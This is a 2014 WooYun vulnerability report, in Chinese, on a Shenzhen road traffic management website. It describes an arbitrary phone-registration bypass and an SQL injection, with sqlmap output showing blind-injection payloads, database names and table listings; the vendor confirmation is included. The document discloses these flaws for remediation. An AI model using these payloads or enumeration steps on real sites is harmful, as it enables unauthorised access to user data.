乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-01: 细节已通知厂商并且等待厂商处理中 2014-07-01: 厂商已经确认,细节仅向厂商公开 2014-07-11: 细节向核心白帽子及相关领域专家公开 2014-07-21: 细节向普通白帽子公开 2014-07-31: 细节向实习白帽子公开 2014-08-15: 细节向公众公开
某道路交通管理事务中心任意手机用户注册+SQL注入
深圳市道路交通管理事务中心:http://www.szrtc.cn/上个月就看了这个站,刚刚看到有人发了乌云:
WooYun: 手机注册验证码明文返回可任意注册用户 正好最近也看到这个网站在版本.于是又登录看了下,但问题还是存在的.
1.任意手机用户注册:
http://www.szrtc.cn/Home/Register
(在注册页面输入自己手机号码.获取验证码之后重新修改任意号码即可)
2.SQL注入:
http://www.szrtc.cn/Search/AdvanceResult?c=new&searchContent=1
Place: GETParameter: searchContent Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: searchContent=0%' AND 5033=5033 AND '%'=' Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: searchContent=0%' AND 7762=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='---web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008available databases [7]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] SZRTCWeb_Product[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: searchContent Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: searchContent=0%' AND 5033=5033 AND '%'=' Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: searchContent=0%' AND 7762=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='---web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008current database: 'SZRTCWeb_Product'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: searchContent Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: searchContent=0%' AND 5033=5033 AND '%'=' Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: searchContent=0%' AND 7762=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='---web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008Database: SZRTCWeb_Product[20 tables]+----------------------------+| CIT_AnswerSheet || CIT_AnswerSheet_Answer || CIT_Question || CIT_QuestionType || CIT_Questionnaire || CIT_Questionnaire_Options || CIT_Questionnaire_Question || NEWS_Article || NEWS_Attachment || NEWS_Column || USER_Account || USER_AccountRole || USER_Department || USER_FunctionPermission || USER_Functions || USER_Menu || USER_MenuPermission || USER_Role || Vw_AdvancedSearch || Vw_UserOrRolePermission |+----------------------------+
危害等级:高
漏洞Rank:15
确认时间:2014-07-01 16:31
非常感谢您的报告。报告中的问题已确认并复现。影响的数据:中攻击成本:低造成影响:高综合评级为:高,rank:15正在联系相关网站管理单位处置
暂无